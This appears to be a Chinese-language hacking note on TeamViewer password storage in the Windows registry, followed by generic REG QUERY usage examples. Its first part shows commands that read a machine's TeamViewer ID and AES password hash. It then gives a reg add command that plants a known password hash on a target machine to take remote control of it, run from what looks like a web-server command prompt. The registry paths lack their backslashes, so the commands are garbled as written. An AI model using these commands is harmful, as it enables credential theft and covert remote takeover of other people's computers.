TeamViewer密码存储
打开注册表位置HKEY_LOCAL_MACHINESOFTWARETeamViewerVersion7
ClientID????????????ID(远程连接时必须项,明文)
SecurityPasswordAES??????这项就是我们期待已久的密码了(hash)
—————————————————————————————————————
直接找到一台已知密码的机器上导出密码并导入到要远控的机器的注册表里:语句如下.
reg add HKEY_LOCAL_MACHINESOFTWARETeamViewerVersion5 /v SecurityPasswordAES /t REG_BINARY /d EA9FA72A50B0ACEBFE322C63199CAEF
附reg query 用法.
c:windowssystem32inetsrv> reg query HKEY_LOCAL_MACHINESOFTWARETeamViewerVersion5 /v Clientid (指定显示CLIENTID)
reg query HKEY_LOCAL_MACHINESOFTWARETeamViewerVersion5 /v securitypasswordaes (得到密码HASH)
示例:
REG QUERY HKLMSoftwareMicrosoftResKit /v Version
显示注册表值 Version 的值
REG QUERY \ABCHKLMSoftwareMicrosoftResKitNtSetup /s
显示远程机器 ABC 上的、在注册表项设置下的所有子项和值
REG QUERY HKLMSoftwareMicrosoftResKitNtSetup /se #
用 “#” 作为分隔符,显示类型为 REG_MULTI_SZ 的所有值名称的所有
子项和值。
REG QUERY HKLM /f SYSTEM /t REG_SZ /c /e
以区分大小写的形式显示项、值和数据和数据类型 REG_SZ
的、在 HKLM 更目录下的、”SYSTEM” 出现的精确次数
REG QUERY HKCU /f 0F /d /t REG_BINARY
显示在 HKCU 根目录下、数据类型为 REG_BINARY 的数据的项、值和
数据的 “0F” 出现的次数。
REG QUERY HKLMSOFTWARE /ve
显示在 HKLMSOFTWARE 下的项、值和数据(默认)